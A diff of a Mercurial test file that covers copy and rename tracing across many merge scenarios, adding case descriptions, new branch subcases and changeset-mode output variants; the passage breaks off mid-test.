- $ hg ci -m 'mDBm-0 simple merge - the other way'
+ $ hg ci -m "mDBm-0 $case_desc - the other way"
created new head
$ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))'
- @ 18 mDBm-0 simple merge - the other way
+ @ mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way
|\
- +---o 17 mBDm-0 simple merge - one way
+ +---o mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way
| |/
- | o 8 d-2 re-add d
+ | o d-2 re-add d
| |
- | o 7 d-1 delete d
+ | o d-1 delete d
| |
- o | 5 b-1: b update
+ o | b-1: b update
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
Comparing with a merge with colliding rename
--------------------------------------------
+Subcase: new copy information on both sides
+``````````````````````````````````````````
+
- the "e-" branch renaming b to f (through 'g')
- the "a-" branch renaming d to f (through e)
+ $ case_desc="merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f)"
+
$ hg up 'desc("a-2")'
2 files updated, 0 files merged, 1 files removed, 0 files unresolved
- $ hg merge 'desc("e-2")' --tool :union
- merging f
- 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("e-2")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
(branch merge, don't forget to commit)
- $ hg ci -m 'mAEm-0 simple merge - one way'
+ $ hg ci -m "mAEm-0 $case_desc - one way"
$ hg up 'desc("e-2")'
- 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
- $ hg merge 'desc("a-2")' --tool :union
- merging f
- 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !)
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !)
+ $ hg merge 'desc("a-2")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
(branch merge, don't forget to commit)
- $ hg ci -m 'mEAm-0 simple merge - the other way'
+ $ hg ci -m "mEAm-0 $case_desc - the other way"
created new head
$ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))'
- @ 20 mEAm-0 simple merge - the other way
+ @ mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way
|\
- +---o 19 mAEm-0 simple merge - one way
+ +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way
| |/
- | o 10 e-2 g -move-> f
+ | o e-2 g -move-> f
| |
- | o 9 e-1 b -move-> g
+ | o e-1 b -move-> g
| |
- o | 4 a-2: e -move-> f
+ o | a-2: e -move-> f
| |
- o | 3 a-1: d -move-> e
+ o | a-1: d -move-> e
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
|
- o 1 i-1: a -move-> c
+ o i-0 initial commit: a b h p q r
+
+
+Subcase: new copy information on both sides with an actual merge happening
+`````````````````````````````````````````````````````````````````````````
+
+- the "p-" branch renaming 't' to 'v' (through 'u')
+- the "q-" branch renaming 'r' to 'v' (through 'w')
+
+ $ case_desc="merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content)"
+
+ $ hg up 'desc("p-2")'
+ 3 files updated, 0 files merged, 2 files removed, 0 files unresolved
+ $ hg merge 'desc("q-2")' --tool ':union'
+ merging v
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mPQm-0 $case_desc - one way"
+ $ hg up 'desc("q-2")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge 'desc("p-2")' --tool ':union'
+ merging v
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mQPm-0 $case_desc - the other way"
+ created new head
+ $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))'
+ o mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way
+ |\
+ +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way
+ | |/
+ | o e-2 g -move-> f
+ | |
+ | o e-1 b -move-> g
+ | |
+ o | a-2: e -move-> f
+ | |
+ o | a-1: d -move-> e
+ |/
+ o i-2: c -move-> d, s -move-> t
|
- o 0 i-0 initial commit: a b h
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+Subcase: existing copy information overwritten on one branch
+````````````````````````````````````````````````````````````
Merge:
- one with change to an unrelated file (b)
- one overwriting a file (d) with a rename (from h to i to d)
+ $ case_desc="simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d)"
+
$ hg up 'desc("i-2")'
2 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg mv h i
@@ -347,45 +481,104 @@
created new head
$ hg mv --force i d
$ hg commit -m "f-2: rename i -> d"
- $ hg debugindex d
+ $ hg debugindex d | ../no-linkrev
rev linkrev nodeid p1 p2
- 0 2 169be882533b 000000000000 000000000000 (no-changeset !)
- 0 2 b789fdd96dc2 000000000000 000000000000 (changeset !)
- 1 8 b004912a8510 000000000000 000000000000
- 2 22 4a067cf8965d 000000000000 000000000000 (no-changeset !)
- 2 22 fe6f8b4f507f 000000000000 000000000000 (changeset !)
+ 0 * d8252ab2e760 000000000000 000000000000 (no-changeset !)
+ 0 * ae258f702dfe 000000000000 000000000000 (changeset !)
+ 1 * b004912a8510 000000000000 000000000000
+ 2 * 7b79e2fe0c89 000000000000 000000000000 (no-changeset !)
$ hg up 'desc("b-1")'
- 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !)
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !)
$ hg merge 'desc("f-2")'
- 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
(branch merge, don't forget to commit)
- $ hg ci -m 'mBFm-0 simple merge - one way'
+ $ hg ci -m "mBFm-0 $case_desc - one way"
$ hg up 'desc("f-2")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg merge 'desc("b-1")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m 'mFBm-0 simple merge - the other way'
+ $ hg ci -m "mFBm-0 $case_desc - the other way"
created new head
+ $ hg up null --quiet
$ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))'
- @ 24 mFBm-0 simple merge - the other way
+ o mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way
|\
- +---o 23 mBFm-0 simple merge - one way
+ +---o mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way
| |/
- | o 22 f-2: rename i -> d
+ | o f-2: rename i -> d
+ | |
+ | o f-1: rename h -> i
| |
- | o 21 f-1: rename h -> i
- | |
- o | 5 b-1: b update
+ o | b-1: b update
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
|
- o 1 i-1: a -move-> c
+ o i-0 initial commit: a b h p q r
+
+
+Subcase: existing copy information overwritten on one branch, with different content
+`````````````````````````````````````````````````````````````````````````````````````
+
+Merge:
+- one with change to an unrelated file (b)
+- one overwriting a file (t) with a rename (from r to x to t); the resulting t content is not the same as on the other branch
+
+ $ case_desc="simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content"
+
+ $ hg up 'desc("i-2")'
+ 6 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg mv r x
+ $ hg commit -m "r-1: rename r -> x"
+ created new head
+ $ hg mv --force x t
+ $ hg commit -m "r-2: rename t -> x"
+ $ hg debugindex t | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * d74efbf65309 000000000000 000000000000 (no-changeset !)
+ 1 * 02a930b9d7ad 000000000000 000000000000 (no-changeset !)
+ 0 * 5aed6a8dbff0 000000000000 000000000000 (changeset !)
+ 1 * a38b2fa17021 000000000000 000000000000 (changeset !)
+ $ hg up 'desc("b-1")'
+ 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge 'desc("r-2")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mBRm-0 $case_desc - one way"
+ $ hg up 'desc("r-2")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge 'desc("b-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mRBm-0 $case_desc - the other way"
+ created new head
+ $ hg up null --quiet
+ $ hg log -G --rev '::(desc("mBRm")+desc("mRBm"))'
+ o mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way
+ |\
+ +---o mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way
+ | |/
+ | o r-2: rename t -> x
+ | |
+ | o r-1: rename r -> x
+ | |
+ o | b-1: b update
+ |/
+ o i-2: c -move-> d, s -move-> t
|
- o 0 i-0 initial commit: a b h
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+Subcase: reset of the copy history on one side
+``````````````````````````````````````````````
+
Merge:
- one with change to a file
- one deleting and recreating the file
@@ -393,8 +586,10 @@
Unlike in the 'BD/DB' cases, an actual merge happened here. So we should
consider history and rename on both branch of the merge.
+ $ case_desc="actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content"
+
$ hg up 'desc("i-2")'
- 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ 6 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ echo "some update" >> d
$ hg commit -m "g-1: update d"
created new head
@@ -404,33 +599,35 @@
merging d
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m 'mDGm-0 simple merge - one way'
+ $ hg ci -m "mDGm-0 $case_desc - one way"
$ hg up 'desc("g-1")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg merge 'desc("d-2")' --tool :union
merging d
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m 'mGDm-0 simple merge - the other way'
+ $ hg ci -m "mGDm-0 $case_desc - the other way"
created new head
$ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))'
- @ 27 mGDm-0 simple merge - the other way
+ @ mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way
|\
- +---o 26 mDGm-0 simple merge - one way
+ +---o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way
| |/
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 8 d-2 re-add d
+ o | d-2 re-add d
| |
- o | 7 d-1 delete d
+ o | d-1 delete d
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
|
- o 1 i-1: a -move-> c
- |
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
+Subcase: merging a change to a file with a "copy overwrite" to that file from another branch
+````````````````````````````````````````````````````````````````````````````````````````````
Merge:
- one with change to a file (d)
@@ -445,38 +642,43 @@
|
| The current code arbitrarily pick one side
+ $ case_desc="merge - G side: content change, F side: copy overwrite, no content change"
+
$ hg up 'desc("f-2")'
1 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg merge 'desc("g-1")' --tool :union
- merging d
- 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ merging d (no-changeset !)
+ 0 files updated, 1 files merged, 0 files removed, 0 files unresolved (no-changeset !)
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !)
(branch merge, don't forget to commit)
- $ hg ci -m 'mFGm-0 simple merge - one way'
+ $ hg ci -m "mFGm-0 $case_desc - one way"
created new head
$ hg up 'desc("g-1")'
- 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !)
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !)
$ hg merge 'desc("f-2")' --tool :union
- merging d
- 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ merging d (no-changeset !)
+ 0 files updated, 1 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
(branch merge, don't forget to commit)
- $ hg ci -m 'mGFm-0 simple merge - the other way'
+ $ hg ci -m "mGFm-0 $case_desc - the other way"
created new head
$ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))'
- @ 29 mGFm-0 simple merge - the other way
+ @ mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way
|\
- +---o 28 mFGm-0 simple merge - one way
+ +---o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way
| |/
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 22 f-2: rename i -> d
+ o | f-2: rename i -> d
| |
- o | 21 f-1: rename h -> i
+ o | f-1: rename h -> i
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
@@ -491,6 +693,8 @@
In this case, the file keep on living after the merge. So we should not drop its
copy tracing chain.
+ $ case_desc="merge updated/deleted - revive the file (updated content)"
+
$ hg up 'desc("c-1")'
1 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg merge 'desc("g-1")'
@@ -502,7 +706,7 @@
[1]
$ hg resolve -t :other d
(no more unresolved files)
- $ hg ci -m "mCGm-0"
+ $ hg ci -m "mCGm-0 $case_desc - one way"
created new head
$ hg up 'desc("g-1")'
@@ -516,23 +720,23 @@
[1]
$ hg resolve -t :local d
(no more unresolved files)
- $ hg ci -m "mGCm-0"
+ $ hg ci -m "mGCm-0 $case_desc - the other way"
created new head
$ hg log -G --rev '::(desc("mCGm")+desc("mGCm"))'
- @ 31 mGCm-0
+ @ mGCm-0 merge updated/deleted - revive the file (updated content) - the other way
|\
- +---o 30 mCGm-0
+ +---o mCGm-0 merge updated/deleted - revive the file (updated content) - one way
| |/
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 6 c-1 delete d
+ o | c-1 delete d
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
@@ -548,13 +752,15 @@
In this case, the file keep on living after the merge. So we should not drop its
copy tracing chain.
+ $ case_desc="merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge)"
+
$ hg up 'desc("c-1")'
0 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg merge 'desc("b-1")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(branch merge, don't forget to commit)
$ hg revert --rev 'desc("b-1")' d
- $ hg ci -m "mCB-revert-m-0"
+ $ hg ci -m "mCB-revert-m-0 $case_desc - one way"
created new head
$ hg up 'desc("b-1")'
@@ -563,23 +769,23 @@
0 files updated, 0 files merged, 1 files removed, 0 files unresolved
(branch merge, don't forget to commit)
$ hg revert --rev 'desc("b-1")' d
- $ hg ci -m "mBC-revert-m-0"
+ $ hg ci -m "mBC-revert-m-0 $case_desc - the other way"
created new head
$ hg log -G --rev '::(desc("mCB-revert-m")+desc("mBC-revert-m"))'
- @ 33 mBC-revert-m-0
+ @ mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way
|\
- +---o 32 mCB-revert-m-0
+ +---o mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way
| |/
- | o 6 c-1 delete d
+ | o c-1 delete d
| |
- o | 5 b-1: b update
+ o | b-1: b update
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
@@ -593,43 +799,724 @@
(the copy information from the branch that was not deleted should win).
+ $ case_desc="simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch)"
+
$ hg up 'desc("i-0")'
- 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ 6 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg mv b d
$ hg ci -m "h-1: b -(move)-> d"
created new head
$ hg up 'desc("c-1")'
- 1 files updated, 0 files merged, 2 files removed, 0 files unresolved
+ 2 files updated, 0 files merged, 3 files removed, 0 files unresolved
$ hg merge 'desc("h-1")'
1 files updated, 0 files merged, 1 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m "mCH-delete-before-conflict-m-0"
+ $ hg ci -m "mCH-delete-before-conflict-m-0 $case_desc - one way"
$ hg up 'desc("h-1")'
+ 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("c-1")'
+ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mHC-delete-before-conflict-m-0 $case_desc - the other way"
+ created new head
+ $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))'
+ @ mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way
+ |\
+ +---o mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way
+ | |/
+ | o h-1: b -(move)-> d
+ | |
+ o | c-1 delete d
+ | |
+ o | i-2: c -move-> d, s -move-> t
+ | |
+ o | i-1: a -move-> c, p -move-> s
+ |/
+ o i-0 initial commit: a b h p q r
+
+
+Variant of previous with extra changes introduced by the merge
+--------------------------------------------------------------
+
+Multiple cases above explicitly test situations where the content is the same on both sides during the merge. In this section we introduce variants of these cases where new changes are introduced to the file content during the merge.
+
+
+Subcase: merge has the same initial content on both sides, but the merge introduces a change
+```````````````````````````````````````````````````````````````````````````````````
+
+Same as `mAEm` and `mEAm` but with an extra change to the file before committing
+
+- the "e-" branch renaming b to f (through 'g')
+- the "a-" branch renaming d to f (through e)
+
+ $ case_desc="merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent)"
+
+ $ hg up 'desc("a-2")'
+ 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("e-2")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
+ (branch merge, don't forget to commit)
+ $ echo "content change for mAE-change-m" > f
+ $ hg ci -m "mAE-change-m-0 $case_desc - one way"
+ created new head
+ $ hg up 'desc("e-2")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge 'desc("a-2")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
+ (branch merge, don't forget to commit)
+ $ echo "content change for mEA-change-m" > f
+ $ hg ci -m "mEA-change-m-0 $case_desc - the other way"
+ created new head
+ $ hg log -G --rev '::(desc("mAE-change-m")+desc("mEA-change-m"))'
+ @ mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way
+ |\
+ +---o mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way
+ | |/
+ | o e-2 g -move-> f
+ | |
+ | o e-1 b -move-> g
+ | |
+ o | a-2: e -move-> f
+ | |
+ o | a-1: d -move-> e
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
+Subcase: merge overwrites common copy information, but with an extra change during the merge
+````````````````````````````````````````````````````````````````````````````````````````
+
+Merge:
+- one with change to an unrelated file (b)
+- one overwriting a file (d) with a rename (from h to i to d)
+- the merge updates the d content
+
+ $ case_desc="merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d)"
+
+ $ hg up 'desc("f-2")'
+ 2 files updated, 0 files merged, 2 files removed, 0 files unresolved
+#if no-changeset
+ $ hg debugindex d | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * d8252ab2e760 000000000000 000000000000
+ 1 * b004912a8510 000000000000 000000000000
+ 2 * 7b79e2fe0c89 000000000000 000000000000
+ 3 * 17ec97e60577 d8252ab2e760 000000000000
+ 4 * 06dabf50734c b004912a8510 17ec97e60577
+ 5 * 19c0e3924691 17ec97e60577 b004912a8510
+ 6 * 89c873a01d97 7b79e2fe0c89 17ec97e60577
+ 7 * d55cb4e9ef57 000000000000 000000000000
+#else
+ $ hg debugindex d | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * ae258f702dfe 000000000000 000000000000
+ 1 * b004912a8510 000000000000 000000000000
+ 2 * 5cce88bf349f ae258f702dfe 000000000000
+ 3 * cc269dd788c8 b004912a8510 5cce88bf349f
+ 4 * 51c91a115080 5cce88bf349f b004912a8510
+#endif
+ $ hg up 'desc("b-1")'
+ 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !)
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !)
+ $ hg merge 'desc("f-2")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
+ (branch merge, don't forget to commit)
+ $ echo "extra-change to (formelly h) during the merge" > d
+ $ hg ci -m "mBF-change-m-0 $case_desc - one way"
+ created new head
+ $ hg manifest --rev . --debug | grep " d"
+ 1c334238bd42ec85c6a0d83fd1b2a898a6a3215d 644 d (no-changeset !)
+ cea2d99c0fde64672ef61953786fdff34f16e230 644 d (changeset !)
+
+ $ hg up 'desc("f-2")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge 'desc("b-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ echo "extra-change to (formelly h) during the merge" > d
+ $ hg ci -m "mFB-change-m-0 $case_desc - the other way"
+ created new head
+ $ hg manifest --rev . --debug | grep " d"
+ 1c334238bd42ec85c6a0d83fd1b2a898a6a3215d 644 d (no-changeset !)
+ cea2d99c0fde64672ef61953786fdff34f16e230 644 d (changeset !)
+#if no-changeset
+ $ hg debugindex d | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * d8252ab2e760 000000000000 000000000000
+ 1 * b004912a8510 000000000000 000000000000
+ 2 * 7b79e2fe0c89 000000000000 000000000000
+ 3 * 17ec97e60577 d8252ab2e760 000000000000
+ 4 * 06dabf50734c b004912a8510 17ec97e60577
+ 5 * 19c0e3924691 17ec97e60577 b004912a8510
+ 6 * 89c873a01d97 7b79e2fe0c89 17ec97e60577
+ 7 * d55cb4e9ef57 000000000000 000000000000
+ 8 * 1c334238bd42 7b79e2fe0c89 000000000000
+#else
+ $ hg debugindex d | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * ae258f702dfe 000000000000 000000000000
+ 1 * b004912a8510 000000000000 000000000000
+ 2 * 5cce88bf349f ae258f702dfe 000000000000
+ 3 * cc269dd788c8 b004912a8510 5cce88bf349f
+ 4 * 51c91a115080 5cce88bf349f b004912a8510
+ 5 * cea2d99c0fde ae258f702dfe 000000000000
+#endif
+ $ hg log -G --rev '::(desc("mBF-change-m")+desc("mFB-change-m"))'
+ @ mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way
+ |\
+ +---o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way
+ | |/
+ | o f-2: rename i -> d
+ | |
+ | o f-1: rename h -> i
+ | |
+ o | b-1: b update
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
+Subcase: restoring an untouched deleted file, while touching it
+````````````````````````````````````````````````````````````````
+
+Merge:
+- one removing a file (d)
+- one leaving the file untouched
+- the merge actively restores the file to the same content (then modifies it)
+
+In this case, the file keeps on living after the merge, so we should not drop
+its copy-tracing chain.
+
+ $ case_desc="merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge)"
+
+ $ hg up 'desc("c-1")'
+ 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("b-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg revert --rev 'desc("b-1")' d
+ $ echo "new content for d after the revert" > d
+ $ hg ci -m "mCB-change-m-0 $case_desc - one way"
+ created new head
+ $ hg manifest --rev . --debug | grep " d"
+ e333780c17752a3b0dd15e3ad48aa4e5c745f621 644 d (no-changeset !)
+ 4b540a18ad699234b2b2aa18cb69555ac9c4b1df 644 d (changeset !)
+
+ $ hg up 'desc("b-1")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg merge 'desc("c-1")'
0 files updated, 0 files merged, 1 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m "mHC-delete-before-conflict-m-0"
+ $ hg revert --rev 'desc("b-1")' d
+ $ echo "new content for d after the revert" > d
+ $ hg ci -m "mBC-change-m-0 $case_desc - the other way"
+ created new head
+ $ hg manifest --rev . --debug | grep " d"
+ e333780c17752a3b0dd15e3ad48aa4e5c745f621 644 d (no-changeset !)
+ 4b540a18ad699234b2b2aa18cb69555ac9c4b1df 644 d (changeset !)
+
+
+ $ hg up null --quiet
+ $ hg log -G --rev '::(desc("mCB-change-m")+desc("mBC-change-m"))'
+ o mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way
+ |\
+ +---o mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way
+ | |/
+ | o c-1 delete d
+ | |
+ o | b-1: b update
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
+Decisions from previous merges are properly chained with later merges
+----------------------------------------------------------------------
+
+Subcase: chaining conflicting rename resolution
+```````````````````````````````````````````````
+
+The "mAEm" and "mEAm" case create a rename tracking conflict on file 'f'. We
+add more change on the respective branch and merge again. These second merge
+does not involve the file 'f' and the arbitration done within "mAEm" and "mEA"
+about that file should stay unchanged.
+
+We also touch `unrelated-j` during some of the merges to check for unrelated
+changes to a new file during a merge.
+
+ $ case_desc="chained merges (conflict -> simple) - same content everywhere"
+
+(extra unrelated changes)
+
+ $ hg up 'desc("a-2")'
+ 6 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ echo j > unrelated-j
+ $ hg add unrelated-j
+ $ hg ci -m 'j-1: unrelated changes (based on the "a" series of changes)'
+ created new head
+
+ $ hg up 'desc("e-2")'
+ 2 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !)
+ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !)
+ $ echo k > unrelated-k
+ $ hg add unrelated-k
+ $ hg ci -m 'k-1: unrelated changes (based on "e" changes)'
+ created new head
+
+(merge variant 1)
+
+ $ hg up 'desc("mAEm")'
+ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !)
+ $ hg merge 'desc("k-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mAE,Km: $case_desc"
+
+(merge variant 2)
+
+ $ hg up 'desc("k-1")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !)
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !)
+
+ $ hg merge 'desc("mAEm")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mK,AEm: $case_desc"
+ created new head
+
+(merge variant 3)
+
+ $ hg up 'desc("mEAm")'
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("j-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ echo jj > unrelated-j
+ $ hg ci -m "mEA,Jm: $case_desc"
+
+(merge variant 4)
+
+ $ hg up 'desc("j-1")'
+ 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !)
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !)
+ $ hg merge 'desc("mEAm")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
